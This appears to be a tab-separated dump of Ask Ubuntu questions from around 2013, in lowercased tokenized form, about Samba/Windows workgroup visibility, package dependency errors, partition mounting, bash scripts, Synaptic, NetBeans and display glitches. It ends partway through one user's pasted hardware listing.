340717	win7 workgroup machine invisible to ubuntu machine in same workgroup	background hi everyone , i am working on an animal welfare initiative on a budget of $ 0 using old machines etc. , so if you can help with this you get a big lick up the side of the face as a thank you from the dogs ( our organization is called dog friendly society ) ... we 're very grass-roots , and in the process of getting a website up & running , so what i am trying to do is get our internal network set up for various purposes including collaboration , development & other experimentation ... this is both for the animal welfare group , and also for related commercial projects which will hopefully generate the funds required to support the vision & activities of the group ... so any help is greatly appreciated . what i am trying to do is make samba work in the windows workgroup with & without passwords first ... and to then make it work in a domain , once some virtual machines ( windows servers - running off the back of these 2 linux machines ) are up & running . problem win7 machine can see ubuntu machine in workgroup & access its share ( user authenticated by samba ) other win7 machine can see the first one ( and vice versa ) , and they can both access each others ' shares ubuntu machine however can see itself in workgroup , can see the 2nd win7 machine in workgroup but ubuntu can not see that first win7 machine who 's user it was set up to share to environment goal do n't know if this is relevant , but here if it helps 2 win7 laptops ( to remain in simple windows workgroup/homegroup if possible ) 1 old computer will become bare-metal ubuntu printer & ( possible ) scanner server 2 other computers set up as ubuntu servers hosting vms for windows server machines ( using vmware player ) & samba file shares ( some file shares for windows workgroup , while other shares are for linux development/experimentation , ms sql server & sharepoint server in the as yet not set up domain ) so one ubuntu server will host a win server active directory domain services / domain controller virtual machine , and the other will host a win server sql & sharepoint server vm the underlying ubuntu servers need to serve some logical volume shares to the workgroup , and others for sql server to use for the sharepoint database please note i am not asking for help with the windows server stuff , i have help with that elsewhere ... just trying to get ubuntu ready for it , and wanted to preempt any questions about why i am doing it this way & thus to suggest another way , and just thought this background info may help you understand my end goals & perhaps help answer the question better - thanks : - ) i am running on a sub-net piggy backed off our landlord as we can not afford the budget for our own internet connection yet ... so i can not port forward etc . as yet ... this is all just set up work in preparation for when we do have the budget for that , and thus achieving our end goals here is the situation so far ( on the first of the 3 linux machines ) : ubuntu set-up i set up ubuntu 13.04 server x64 did a sudo apt-get update & upgrade installed the ubuntu-desktop ( since i am new to command line administration ) installed required packages : samba & system-config-samba ( ui ) created a volume group & logical volume for the samba share mounted that to /shares/share-u64 ( just so the name helps me identify it versus other possible shares ) modified fstab to automount that share location also ( successfully ) modified /etc/networkmanager/networkmanager.conf > managed=true modified /etc/network/interfaces > comment out : auto eth0 & iface eth0 inet dhcp created my own network connection with static ip address , primary dns set for soon to be created dns virtual machine ( also for active directory / domain controller as stated ) , and secondary dns set to router/network extender for our subnet modified /etc/default/avahi-daemon > avahi_daemon_detect_local=0 hosts file prep added info about the aforementioned windows server vms i want to set up on this & another ubuntu server to the /etc/hosts file ( though the vms havent been created yet ) , including fqdn & aliases for each ( with the static ip addresses i intend to set for each machine ) > format : ip-address computer-name.domain-name alias_1 ... alias_n also added ip add , fqdn & alias for soon to be created 2nd ubuntu server i figured it would n't matter adding this info to the hosts file early ( before those vms & the other ubuntu server were ready ) as it would just ignore it or time-out any calls to those machines if the machines do n't yet exist later added entry for the win7 machine ( the one that i ca n't see from ubuntu in the windows workgroup ) to the hosts file with the line format : 192.168.1.x computer-name ( but not including its fqdn since the domain controller isnt set up yet ) - in an attempt to resolve the problem of not being able to see that machine from ubuntu in the workgroup ( this solution appeared to have no effect ) samba configuration configured the /etc/samba/smb.conf file ( both via gui & at command line - to double check & add things the gui didnt allow ) , format as follows : global workgroup = netbios name = usershare owner only = false server string = % h server ( samba , ubuntu ) wins support = yes name resolve order = wins lmhosts hosts bcast dns proxy = no security = user obey pam restrictions = yes invalid users = root passwd program = /etc/bin/passwd % u passwd chat = enter\snew\sunix\spassword : % n\n blah blah blah ( dont think you need to know the rest of that line ) username map = /etc/samba/smbusers share-u64 path = /shares/share-u64 writeable = yes browseable = yes valid users = trevor ( and this user is set up & mapped to a win7 username ) i noticed that no lmhosts file existed ( i tried finding it with sudo locate , but it was only in man pages but no actual working file ) , so i ran a command line instruction i found ( sorry , did n't write that one down unfortunately ) , which apparently tells the nmbd service where to look for the lmhosts file or adds a new lmhosts file to the ones it uses ( ? ) ... and then created an lmhosts file in that location with the entry format : - 192.168.1.x netbios_name ... for the machine that i could n't see ... then tried restarting the nmbd service & then rebooting the whole machine ( and the win7 machine ) ... but to no avail other things tried found a forum suggesting to change win7 local security policy for : network security : lan manager authentication level & also for disabling required 128-bit encryption ... but neither of these things made my win7 machine visible to the ubuntu machine , and i doubt they were what got the samba share running anyway , as i had seen plenty of tutorials on samba that never mentioned & didnt require this step finally i have tried other things too , but forgotten what those things were ( sorry , been awake days running working with hardware issues & windows server preparation before i even began this ubuntu & samba stuff ... but that is the bulk of it anyway , and many other things that i may have forgotten to mention hopefully wo n't be relevant as i did a sudo remove & purge on them i tried to add a tag of `` visibility '' to this , which i thought would be helpful ... but said i needed 300 points rep to add a new tag ... so if anyone 300+ reads this , and you agree it 's a good tag , perhaps add it ( can others add tags to my post ? ) thanks thanks in advance for your help : - ) update - windows network settings ipconfig on affected win7 machine ( possible relevant lines ) : windows ip configuration : primary dns suffix = blank node type = hybrid ip routing enabled = no wins proxy enabled = no lan adapter network connection : dhcp enabled = no autoconfiguration enabled = yes dns servers = ip address for as yet non existent windows server which will be ad ds / domain controller & dns ; secondary dns set to 192.168.1.1 ( router ) primary wins server = 192.168.1.30 ( address of this ubuntu machine that i ca n't see it from ) secondary wins servers = ip addresses for yet to be created vm & second ubuntu machine ( also yet to be created ) netbios over tcpip = enabled ... so i ca n't see anything wrong there , and the only difference with the other win7 machine is : it has only 1 dns server set ( the router ) it has no wins servers set crash in gvfsd-network just to add to info if this helps ... after a reboot & attempting to access windows workgroup , there was a crash in gvfsd-network after following another piece of advice & rebooting both machines ... this same service crashed again when i logged in & tried to view the windows network via the file viewer ui ... so clearly something is wrong there windows homegroup update just out of curiosity , left my windows homegroup on that win7 machine , and it was unable to create a new homegroup ( with error message ) : `` windows can not set up a homegroup on this computer '' ... which may or may not relate to this problem ( ? ) access workgroup-visible win7 machine error when i try to actually access the public shares on the 2nd win7 machine that i can see from ubuntu in the workgroup ( via file viewer ui ) , there is a message window at first that says : '' opening compurer-name : you can stop this operation by clicking cancel '' ... and eventually i get an error saying : '' unable to access location : failed to retrieve share list from server : connection timed out '' so perhaps this is an indication that something in the hosts file is confusing samba/ubuntu ( with respect to hosts that do not exist ) ... i will try commenting out those lines to see how it responds after reboot ( and report back with another point to this update ) result : commenting out yet to be created servers in /etc/hosts file did nothing windows registry changes - suggested by samba.org forum post unfortunately the suggested samba.org registry changes for win7 , being : [ hkey_local_machine\system\currentcontrolset\services\lanmanworkstation\parameters ] dword domaincompatibilitymode 1 dword dnsnameresolutionrequired 0 ... did not fix the problem either nmap 192.168.1 . * - did not show the win7 machine can however ping to both netbios / computer name & ip address of win7 machine possible conclusion is that network adapted settings on win7 are interfering ( though this doesnt explain inability to see win7 shares on other win7 machine that is visible ) checking share settings of both win7 machines again to see if anything stands out , and will remove wins server settings from the win7 machine with visibility problems removal of non-existent host entries & windows network troubleshooting following on from last update ( nmap command ) , when i removed additional entries from the adapted settings ( such as the as yet non-existent primary dns server , leaving only the router , and removing the wins entries ) , then following the instructions here : http : //windows.microsoft.com/en-au/windows7/why-cant-i-create-a-homegroup http : //answers.microsoft.com/en-us/windows/forum/windows_7-networking/cant-create-a-homegroup-on-my-windows-7-computer/ca1ed02c-6557-41f8-a37d-5d4f98861266 ... and then rebooted , i could finally see my win7 machine from ubuntu in the windows network > workgroup , though still not in the parent area to both those ( in the file viewer ui ) `` browse network '' ( although both the router / gateway & other win7 machine appear here ) . however , i still can not access the files on it ... though at least a step closer
340720	the dash home is very slow ( ubuntu 13.04 )	so i just installed ubuntu 13.04 32bit ( alongside windows 7 ) , everything fine in the installation , i loged in and everything fine , until i opened the dash home , it was absurdly slow , so slow that the computer froze and i hat to restart it . so i looked for a solution on internet and i installed `` unity tweak tool '' and disabled blur on the dash home . that helped a lot , but it 's still quite slow ( mostly while typing , but everything in general is slow ) but at least it does n't freeze anymore ( at least not everytime i open it , since i did that blur thing it just froze once ) but as i said , it 's still quite slow and this is very annoying , is there a solution ? here is my computer info if it helps : ram : 2gb processor : amd athlon ( tm ) 64 x2 dual core processor 4200+ ă 2 graphics ( drivers ) : gallium 0.4 on nv46
340723	can not install php curl , php5-common discrepency	when every i try to install php5-curl , php5-common , php5 i always get following error : the following packages have unmet dependencies : php5-curl : depends : php5-common ( = 5.3.10-1ubuntu3 ) but 5.3.10-1ubuntu3.7 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .` i 've tried every suggestion , including clean , remove , update . i ca n't reinstall or start a new instance . any suggestions ? system information as of tue sep 3 04:50:44 utc 2013 system load : 0.0 processes : 72 usage of / : 5.4 % of 98.52gb users logged in : 1 memory usage : 61 % ip address for eth0 : 10.184.33.3 swap usage : 0 % ubuntu 12.04.1 lts ( gnu/linux 3.2.0-29-virtual x86_64 )
340729	i have replaced the harddisk of my laptop . i need to get data from ext3 partitions of old harddisk .	unable to mount the partitions sudo mount /dev/sdb4 /media/sdb4 -t ext4 mount : wrong fs type , bad option , bad superblock on /dev/sdb4 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try i get the output as below for command : sudo fdisk -lu disk /dev/sdb : 500.1 gb , 500107860992 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773166 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000d3c84 device boot start end blocks id system /dev/sdb1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sdb2 206848 204802047 102297600 7 hpfs/ntfs/exfat /dev/sdb3 204804094 879108929 337152418 5 extended /dev/sdb4 879110144 976772253 48831055 83 linux /dev/sdb5 204804096 236923236 16059570+ 83 linux /dev/sdb6 302471883 879108929 288318523+ 83 linux /dev/sdb7 236924928 253643677 8359375 82 linux swap / solaris /dev/sdb8 253644800 302471167 24413184 83 linux
340732	script to enter data from mysql database into text file	i have written a script to extract the contents of a table into a textfile . this is my code # ! /bin/bash mysql -uroot -ppasswd database select * from table > textfile.txt i have changed permissions on the file and when i run it using ./myscript it creates textfile.txt but loads into it the mysql manual.how can i achieve my desired result
340744	gnome search box to search history	i am using gnome 3.6 on ubuntu 13.04 . is there any way to search history/ bookmarks of web ( gnome web browser ) from the search box directly ? so , i can hit windows , type askubuntu , will get askubuntu.com in the result and visit the website ?
340745	should i allow kernel updates ?	i am using ubuntu 12.04 and the update manager appears daily with updates . i am ok with other updates but i want to know about linux kernel updates : should i update to new versions , and why ?
340754	why does n't synaptic start ?	when i start synaptic package manager normally ( super-synaptic ) , it asks for a password . when i enter password , nothing happens ! when i start synaptic form terminal using synaptic-pkexec , i get : no protocol specified ** ( synaptic:2760 ) : warning ** : could not open x display no protocol specified ( synaptic:2760 ) : gtk-warning ** : can not open display : :0 and i am back to the prompt . when i start synaptic form terminal using sudo synaptic , it asks for sudo password in the terminal on entering it , it gives : ( synaptic:2721 ) : ibus-warning ** : the owner of /home/ ... ./ibus/bus is not root ! then several messages like : ( synaptic:2842 ) : gtk-warning ** : gtknotebook 0x84c1128 is mapped but visible child gtklabel 0x8693970 is not mapped and synaptic starts with administrative privileges . what is happening ? how do i get the normal behaviour ( super-synaptics-password ) sequence back ?
340758	broken package on ubuntu ! -failed to remove or fix it	i have a problem . i open the synaptic package manager and an error message appear and show me that there is a broken package on my system . i am going to fix it on terminal by typing 'sudo apt-get install -f ' and terminal show me : reading package lists ... done building dependency tree ... done reading state information ... done correcting dependencies ... done the following packages will be removed : libc6-dev 0 upgraded , 0 newly installed , 1 to remove and 172 not upgraded . 1 not fully installed or removed . after this operation , 13.7mb disk space will be freed . do you want to continue ? [ y/n ] ? y perl : warning : setting locale failed . perl : warning : please check that your locale settings : language : = ( unset ) , lc_all = ( unset ) , lang = `` el_gr.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) ca n't exec `` locale '' : no such file or directory at /usr/share/perl5/debconf/encoding.pm line 16 . use of uninitialized value $ debconf : :encoding : charmap in scalar chomp at /usr/share/perl5/debconf/encoding.pm line 17. dpkg : `ldconfig ' not found on path . dpkg : 1 expected program ( s ) not found on path . nb : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin e : sub-process /usr/bin/dpkg returned an error code ( 2 )
340761	a simple video editor	i am looking for an easy video editor for ubuntu 12.04 . my needs are simple : make clips and upload them on sites ( cut segments from a video file with frame to frame precision , convert into common formats , resize the file ) . do you have to suggest one ? thanks for the reply .
340766	ubuntu server : udev automount - ca n't unmount this usb drive . any idea ?	i use ubuntu server 12.04.03 lts ( without gui ) and wrote an udev rule : kernel== '' sd ? 1 '' , subsystems== '' usb '' , attrs { product } == '' mass storage device '' , run+= '' /bin/mount /dev/ % k /mnt/usbdrive '' this is works well , but then i want to unmount the drive with this command : sudo umount /mnt/usbdrive but it is n't work , and there is n't any error message . what can i do ?
340767	unexpected eof in a bash script , why ?	i ca n't normally run sh scripts . it 's confusing . i set the permissions to 777 and +x so it should work with the 'sh ' command , right ... but it 's working very strange . for example this scripts works ok : echo `` hello '' it prints `` hello '' with no errors . but this script : # ! /bin/bash for i in `seq 1 5` ; do echo $ i done ... outputs this error : syntax error : end of file unexpected ( expecting `` done '' ) is there something wrong with that loop ?
340768	netbeans keep acting strange . can i get it fixed or install a better ide with recommended plugins ?	but the problem is , today is my third day using ubuntu , and i find it is amazing . except i just ca n't setting a good ide . netbeans is my ide on win8 and maybe my favoriate ide on ubuntu . here is the thing : 1 first i install netbeans using apt-get and installed with a netbeans versioned 7.0.1 . 2 but it ca n't create a project or running one with existing codes and keep saying : loading projects ( i thought it was someting wrong with netbeans but turns out to be the wrong version of my java jdk ) . 3 so i install , or update , ca n't figure out what that line of code means yet , java jdk . and now netbeans is working ok except sometime ca n't fold my codes or stuck asap i use code autocomplete . or if i ca n't fix my netbeans , i hope someone can recommend me a new editor with plugins . a nice editor like gedit works pretty well except it could be a little uncomfotable when i am working with more than 20 methods in a class ... lol so , if there r some available plugins like : 1 code folding plugins 2 autocomplete plubgins i will be trully thanksful . summary : 1 how to fix netbean 2 or how can i get good editor with plugins
340770	how to uninstall the ubuntu sdk ?	after installing the ubuntu sdk v1.009 on ubuntu 12.04.2 lts , the computer started behaving in a very unstable manner . also note that installing the ubuntu sdk also installs a lot of test libraries over the stable ones . i wanted to know if there is any way to uninstall the sdk without reinstalling ubuntu . i also want to replace the installed , unstable libraries with the latest stable ones . thanks in advance
340771	root @ mickey : / # su goofy & & ssh goofy.com -- why does this fail ?	mickey ( who is logged in as root ) tries to use goofy 's account to ssh into goofy.com . root @ mickey : / # su goofy & & ssh goofy.com however this fails to login goofy on goofy.com , instead : goofy @ mickey : / $ ( only su goofy worked , so goofy exits : goofy @ mickey : / $ exit exit permission denied ( publickey ) . i 'd expect the permission error for any user other than goofy . how can i do su goofy ssh goofy.com in one line ?
340772	wanda the fish for gnome 3.8 ubuntu 13.04	is there any way to install wanda the fish in gnome 3.8 running on ubuntu 13.04 ?
340780	background messed up on ubuntu vm	i am using vmware workstation 9.x ( latest ) and ubuntu 13.04 ( latest ) and have this issue : the background often gets messed up , black or something . i think it 's related to the fact that i am running ubuntu as a virtual machine with vmware workstation . i do use the vmware tools . i was unable to find any helpful information when searching on google . i know it 's only an aesthetic issue , but it bothers me . it mostly happens at random times , when i am just using the gnome-terminal . what can explain the background in my ubuntu desktop vm getting messed up ?
340781	lines on the screen	i am using ubuntu 12.04 . suddenly sometimes violet coloured lines show up on my pc screen lines like this : why are these kind of lines appearing on the screen ? running lspci gave the following output : lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b4 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b4 ) 00:1c.5 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 6 ( rev b4 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 04 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 04 ) 07:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 0d:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5116 pci express card reader ( rev 01 ) 13:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) lsmod gave the following output : lsmod module size used by cdc_acm 26992 0 ath3k 12969 0 ipt_masquerade 12760 0 xt_dscp 12630 0 nf_conntrack_irc 13384 0 snd_hrtimer 12745 1 snd_hda_codec_hdmi 32476 1 snd_hda_codec_conexant 58308 1 pci_stub 12623 1 vboxpci 23237 0 vboxnetadp 13383 0 vboxnetflt 23479 0 vboxdrv 287105 3 vboxpci , vboxnetadp , vboxnetflt joydev 17694 0 coretemp 13642 0 kvm_intel 137888 0 kvm 422160 1 kvm_intel ghash_clmulni_intel 13221 0 hid_generic 12541 0 cryptd 20531 1 ghash_clmulni_intel usbhid 47259 0 iptable_nat 13230 0 hid 100815 2 hid_generic , usbhid iptable_mangle 12735 0 snd_hda_intel 34117 3 snd_hda_codec 135141 3 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel snd_hwdep 17765 1 snd_hda_codec uvcvideo 78117 0 videobuf2_core 33025 1 uvcvideo snd_pcm 97523 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec btusb 22432 0 videodev 125126 2 uvcvideo , videobuf2_core xt_hl 12522 6 videobuf2_vmalloc 12861 1 uvcvideo videobuf2_memops 13405 1 videobuf2_vmalloc snd_seq_midi 13325 0 ip6t_rt 12559 3 bnep 18240 2 snd_rawmidi 30750 1 snd_seq_midi snd_seq_midi_event 14900 1 snd_seq_midi nf_conntrack_ipv6 14107 7 nf_defrag_ipv6 13413 1 nf_conntrack_ipv6 microcode 23030 0 ipt_reject 12577 1 snd_seq 61931 3 snd_seq_midi , snd_seq_midi_event xt_log 17454 12 xt_limit 12712 13 parport_pc 32867 0 xt_tcpudp 12604 16 ppdev 17114 0 xt_addrtype 12714 0 arc4 12530 2 xt_state 12579 13 psmouse 102075 0 rfcomm 47562 0 ip6table_filter 12816 1 bluetooth 211812 15 ath3k , btusb , bnep , rfcomm serio_raw 13216 0 ip6_tables 27686 2 ip6t_rt , ip6table_filter nf_conntrack_netbios_ns 12666 0 nf_conntrack_broadcast 12590 1 nf_conntrack_netbios_ns nf_nat_ftp 12705 0 nf_nat 25646 3 ipt_masquerade , iptable_nat , nf_nat_ftp nf_conntrack_ipv4 14531 9 iptable_nat , nf_nat nf_defrag_ipv4 12730 1 nf_conntrack_ipv4 nf_conntrack_ftp 13453 1 nf_nat_ftp nf_conntrack 83300 11 ipt_masquerade , nf_conntrack_irc , iptable_nat , nf_conntrack_ipv6 , xt_state , nf_conntrack_netbios_ns , nf_conntrack_broadcast , nf_nat_ftp , nf_nat , nf_conntrack_ipv4 , nf_conntrack_ftp iptable_filter 12811 1 snd_timer 29990 3 snd_hrtimer , snd_pcm , snd_seq ip_tables 27474 3 iptable_nat , iptable_mangle , iptable_filter lpc_ich 17145 0 x_tables 29892 16 ipt_masquerade , xt_dscp , iptable_nat , iptable_mangle , xt_hl , ip6t_rt , ipt_reject , xt_log , xt_limit , xt_tcpudp , xt_addrtype , xt_state , ip6table_filter , ip6_tables , iptable_filter , ip_tables snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq sony_laptop 54939 0 rts_pstor 445318 0 ath9k 150049 0 snd 83674 17 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device mac80211 601865 1 ath9k ath9k_common 14054 1 ath9k ath9k_hw 413487 2 ath9k , ath9k_common ath 23828 3 ath9k , ath9k_common , ath9k_hw i915 530857 3 cfg80211 524435 3 ath9k , mac80211 , ath compat 19596 5 ath9k , mac80211 , ath9k_common , ath9k_hw , cfg80211 drm_kms_helper 49259 1 i915 soundcore 15092 1 snd mei 41410 0 drm 290344 4 i915 , drm_kms_helper snd_page_alloc 18573 2 snd_hda_intel , snd_pcm mac_hid 13254 0 i2c_algo_bit 13565 1 i915 video 19598 1 i915 usbserial 42594 0 lp 17800 0 parport 46563 3 parport_pc , ppdev , lp binfmt_misc 17541 1 r8169 62766 0 lshw gave the following output : lshw sony-vpceh15en description : notebook product : vpceh15en ( n/a ) vendor : sony corporation version : c105tu5u serial : 27544512-7009048 width : 64 bits capabilities : smbios-2.7 dmi-2.7 vsyscall32 configuration : boot=normal chassis=notebook family=vaio sku=n/a uuid=c0cc3724-1df6-de11-88cf-78843ce70f5a *-core description : motherboard product : vaio vendor : sony corporation physical id : 0 version : n/a serial : n/a *-firmware description : bios vendor : insyde physical id : 0 version : r0180z9 date : 04/28/2011 size : 1mib capacity : 1984kib capabilities : pci pnp upgrade shadowing cdboot bootselect edd int9keyboard int10video acpi usb smartbattery biosbootspecification netboot *-memory description : system memory physical id : 7 slot : system board or motherboard size : 2gib *-bank:0 description : sodimm ddr3 physical id : 0 slot : sodimm1 size : 2gib width : 64 bits *-bank:1 description : sodimm [ empty ] physical id : 1 slot : sodimm2 *-cpu description : cpu product : intel ( r ) core ( tm ) i3-2310m cpu @ 2.10ghz vendor : intel corp. physical id : c bus info : cpu @ 0 version : intel ( r ) core ( tm ) i3-2310m cpu @ 2.10ghz serial : n/a slot : n/a size : 1300mhz capacity : 2100mhz width : 64 bits clock : 100mhz capabilities : fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp x86-64 constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer xsave avx lahf_lm arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid cpufreq *-cache:0 description : l1 cache physical id : d slot : l1 cache size : 128kib capacity : 128kib capabilities : synchronous internal write-through *-cache:1 description : l2 cache physical id : e slot : l2 cache size : 512kib capacity : 512kib capabilities : synchronous internal write-through unified *-cache:2 description : l3 cache physical id : f slot : l3 cache size : 3mib capacity : 3mib capabilities : synchronous internal write-through unified *-pci description : host bridge product : 2nd generation core processor family dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 09 width : 32 bits clock : 33mhz *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:43 memory:90000000-903fffff memory:80000000-8fffffff ioport:4000 ( size=64 ) *-communication description : communication controller product : 6 series/c200 series chipset family mei controller # 1 vendor : intel corporation physical id : 16 bus info : pci @ 0000:00:16.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : driver=mei latency=0 resources : irq:42 memory:92604000-9260400f *-usb:0 description : usb controller product : 6 series/c200 series chipset family usb enhanced host controller # 2 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 04 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:16 memory:92609000-926093ff *-multimedia description : audio device product : 6 series/c200 series chipset family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:44 memory:92600000-92603fff *-pci:0 description : pci bridge product : 6 series/c200 series chipset family pci express root port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : b4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:17 memory:92500000-925fffff *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : mon0 version : 01 serial : cc : af:78 : b3 : e5:0f width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list logical wireless ethernet physical configuration : broadcast=yes driver=ath9k driverversion=3.5.0-23-generic firmware=n/a ip=192.168.1.3 latency=0 link=yes multicast=yes promiscuous=yes wireless=ieee 802.11bgn resources : irq:16 memory:92500000-9250ffff *-pci:1 description : pci bridge product : 6 series/c200 series chipset family pci express root port 4 vendor : intel corporation physical id : 1c.3 bus info : pci @ 0000:00:1c.3 version : b4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:19 ioport:3000 ( size=4096 ) memory:91500000-924fffff ioport:90400000 ( size=16777216 ) *-generic description : unassigned class product : rts5116 pci express card reader vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:0d:00.0 logical name : scsi6 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list emulated scsi-host configuration : driver=rts_pstor latency=0 resources : irq:19 memory:91500000-91500fff *-disk description : scsi disk physical id : 0.0.0 bus info : scsi @ 6:0.0.0 logical name : /dev/sdb *-pci:2 description : pci bridge product : 6 series/c200 series chipset family pci express root port 6 vendor : intel corporation physical id : 1c.5 bus info : pci @ 0000:00:1c.5 version : b4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:16 ioport:2000 ( size=4096 ) ioport:91400000 ( size=1048576 ) *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:13:00.0 logical name : eth0 version : 06 serial : 78:84:3c : e7:0f:5a size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8168e-2.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:41 ioport:2000 ( size=256 ) memory:91404000-91404fff memory:91400000-91403fff *-usb:1 description : usb controller product : 6 series/c200 series chipset family usb enhanced host controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 04 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:23 memory:92608000-926083ff *-isa description : isa bridge product : hm65 express chipset family lpc controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 04 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : latency=0 *-storage description : sata controller product : 6 series/c200 series chipset family 6 port sata ahci controller vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 version : 04 width : 32 bits clock : 66mhz capabilities : storage msi pm ahci_1.0 bus_master cap_list configuration : driver=ahci latency=0 resources : irq:40 ioport:4088 ( size=8 ) ioport:4094 ( size=4 ) ioport:4080 ( size=8 ) ioport:4090 ( size=4 ) ioport:4060 ( size=32 ) memory:92607000-926077ff *-serial unclaimed description : smbus product : 6 series/c200 series chipset family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 04 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory:92605000-926050ff ioport:4040 ( size=32 ) *-scsi:0 physical id : 1 logical name : scsi0 capabilities : emulated *-disk description : ata disk product : toshiba mk3265gs vendor : toshiba physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : gh01 serial : 51rhd5znb size : 298gib ( 320gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=31d2e51f *-volume:0 description : windows ntfs volume physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 version : 3.1 serial : 7a10-3e4b size : 10gib capacity : 10gib capabilities : primary ntfs initialized configuration : clustersize=4096 created=2012-09-20 06:57:12 filesystem=ntfs label=recovery state=clean *-volume:1 description : windows ntfs volume physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 version : 3.1 serial : 2211-22b9 size : 81mib capacity : 100mib capabilities : primary bootable ntfs initialized configuration : clustersize=4096 created=2012-09-20 06:57:15 filesystem=ntfs label=system reserved state=clean *-volume:2 description : windows ntfs volume physical id : 3 bus info : scsi @ 0:0.0.0,3 logical name : /dev/sda3 version : 3.1 serial : f82916f5-3a21-3848-88f6-cf2de9978d9b size : 159gib capacity : 159gib capabilities : primary ntfs initialized configuration : clustersize=4096 created=2012-09-20 06:57:16 filesystem=ntfs modified_by_chkdsk=true mounted_on_nt4=true resize_log_file=true state=dirty upgrade_on_mount=true *-volume:3 description : extended partition physical id : 4 bus info : scsi @ 0:0.0.0,4 logical name : 